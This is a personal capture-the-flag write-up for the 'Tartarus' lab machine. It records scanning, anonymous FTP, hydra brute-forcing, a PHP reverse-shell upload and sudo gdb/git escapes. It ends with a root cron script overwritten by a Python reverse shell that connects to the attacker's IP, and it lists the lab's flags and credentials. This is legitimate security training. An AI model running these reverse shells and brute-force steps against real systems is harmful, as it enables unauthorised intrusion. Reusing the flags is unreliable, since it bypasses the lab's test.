# Tartarus

> Shay Pasvolsky
> Started: 07/10/20 08-22-22
> Finished: 07/10/20 11-00-00

---

---

## General info

```bash
export MIP=10.10.218.194
export MyIP=10.9.134.47
```

### Users

```txt
    User: d4rckh
        Password:
        for what use: server

    User: enox
        Password: P@ssword1234
        for what use: http://10.10.218.194/sUp3r-s3cr3t/

    User:
        Password:
        for what use:
```

### Open Ports

```txt
    port: 21
        type: tcp
        service: vsftpd
            version: 3.0.3
            Has Vuln: ?
            Info: Allows anonymous login

    port: 22
        type: tcp
        service: OpenSSH
            version: 7.2p2
            Has Vuln: yes

    port: 80
        type: tcp
        service: Apache
            version: 2.4.18
            Has Vuln: yes
```

---

## Story

```bash
    export MIP=10.10.131.131
    export MyIP=10.9.134.47
    sudo nmap -sC -sV -vvv $MIP -oN scans/local/nmap/standart                           # got 3 ports: 21,22,80
    sudo nmap -sC -sV -vvv --script vuln $MIP -oN scans/local/nmap/standart-w-vuln
    ftp $MIP                                                                            # User: anonymous pass: ''
    ls -al                                                                              # shows {"test.txt", "...", ".../.../", "../../yougotgoodeyes.txt"}
    get test.txt
    cd ../
    cd../
    get yougotgoodeyes.txt
    exit
    sudo nmap -sC -sV -vvv -p- -A $MIP -oN scans/local/nmap/allports-agresiv
    sudo gobuster dir -u http://10.10.218.194 -o scans/local/gobuster/dirs -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 100 # Found nothing
    sudo gobuster dir -u http://10.10.218.194 -o scans/local/gobuster/dirs -w /usr/share/wordlists/rockyou.txt -t 100
    mkdir scans/local/hydra
    sudo hydra -L FilesFromServer/from\ webserver/userid -P FilesFromServer/from\ webserver/credentials.txt ssh://$MIP >> scans/local/hydra/results # Killed it and started over
    sudo hydra -L FilesFromServer/from\ webserver/userid -P FilesFromServer/from\ webserver/credentials.txt ssh://$MIP -o scans/local/hydra/working\ creds -u -v -t 4 # NADA
    sudo hydra $MIP -L FilesFromServer/from\ webserver/userid -P FilesFromServer/from\ webserver/credentials.txt http-post-form "/sUp3r-s3cr3t/authenticate.php/:username=^USER^&password=^PASS^&Login=Login:F=Incorrect*" -o scans/local/hydra/working\ creds -u -v -t 4
```

```vscode
    open yougotgoodeyes.txt -> shows: sUp3r-s3cr3t/
```

```firefox-gui
    go to http://10.10.218.194                  -> Nothing special
    go to http://10.10.218.194/robots.txt       -> has contents: {"Disallow : /admin-dir", "I told d4rckh we should hide our things deep."}
    go to http://10.10.218.194/admin-dir/       -> shows directory contents: {"credentials.txt" , "userid"}
    go to http://10.10.218.194/sUp3r-s3cr3t/    -> login page
```

```bash
    sqlmap -u "http://10.10.218.194/sUp3r-s3cr3t/" --forms --dump | tee scans/local/sqlmap/sqlmapbasic # NADA
```

```firefox-gui
    enter u:enox p:P@ssword1234     -> http://10.10.218.194/sUp3r-s3cr3t/home.php   -> upload page
    upload files to test: {"1.txt", "1.php"}    -> both uploaded
    find the location thy are stored, try: {"/upload", "uploads/", "images/", "images/upload/", "images/uploads/"}  -> "images/uploads/" worked
```

```txt
    can upload and run php  -> look for php shell scripts
```

```firefox-gui
    search for "php shell exploits" and "php-reverse shell", find one you like
```

```vscode
    edit the shell and save as shell.php
```

```bash
    nc -lnvp 9999
```

```firefox-gui
    upload the shell.php
    navigate to it
```

```bash
    # Got a shell
    whoami  # To test it works  -> got www-data
    pwd     # Got /
    find / -name user.txt 2>/dev/null   # Got /home/d4rckh/user.txt
    cat /home/d4rckh/user.txt # Got 0f7dbb2243e692e3ad222bc4eff8521f

    # Stablize the shell
    python -c 'import pty; pty.spawn("/bin/bash")'
    ctrl Z
    stty raw -echo; fg
    stty rows $ROWS cols 237
    export TERM=xterm-256color
    exec /bin/bash

    find / -name user.txt 2>/dev/null # found nothing
    ls -la /home # found: {"cleanup", "d4rckh", "thirtytwo"}
    ls -ls /home/d4eckh # Got: {"user.txt", "cleanup.py"} -> can run cleanup.py, can read it and can execute it, owund by root
    sudo -l # can run /var/www/gdb as thirtytwo with no password
    sudo -u thirtytwo /var/www/gdb
    quit
    sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit # will give me thirtytwo`s shell
    whoami # Double check
    sudo -l # Gives (d4rckh) NOPASSWD: /usr/bin/git

    # need to move to d4rckh, run:

    sudo -u d4rckh /usr/bin/git -p help config
    #!/bin/sh

    # Moved to d4rckh

    sudo - l # requires password we dont have
    cat /etc/crontab # check if ther`s any cron jobs, there is
```

```txt
'    /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.

    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

    # m h dom mon dow user command
    */2 *   * * *   root    python /home/d4rckh/cleanup.py
    17 * * * * root    cd / && run-parts --report /etc/cron.hourly
    25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#'
```

```bash
    # Stablize the shell again
    python -c 'import pty; pty.spawn("/bin/bash")'
    ctrl Z
    stty raw -echo; fg
    export SHELL=bash
    export TERM=xterm-256color
    stty rows $ROWS cols $COLS
    exec /bin/bash

    cp cleanup.py cleanup.py.back

    vi cleanup.py
    ddddddddd # until it`s blank
    i
    # -*- coding: utf-8 -*-
    #!/usr/bin/env python
    import socket, os
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.9.134.47", 8888))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    os.system("/bin/sh -i")
    esc
    :wq
    cat cleanup.py # verifi the contents
```

```txt
    Open another terminal
```

```bash
    nc -lnvp 8888
    whoami # gives root
    find / -name root.txt # gives /root/root.txt
    cat /root/root.txt # gives 7e055812184a5fa5109d5db5c7eda7cd
```

## Tasks

### Task 1

1. User flag

    ```txt
        0f7dbb2243e692e3ad222bc4eff8521f
    ```

2. root flag

    ```txt
        7e055812184a5fa5109d5db5c7eda7cd
    ```
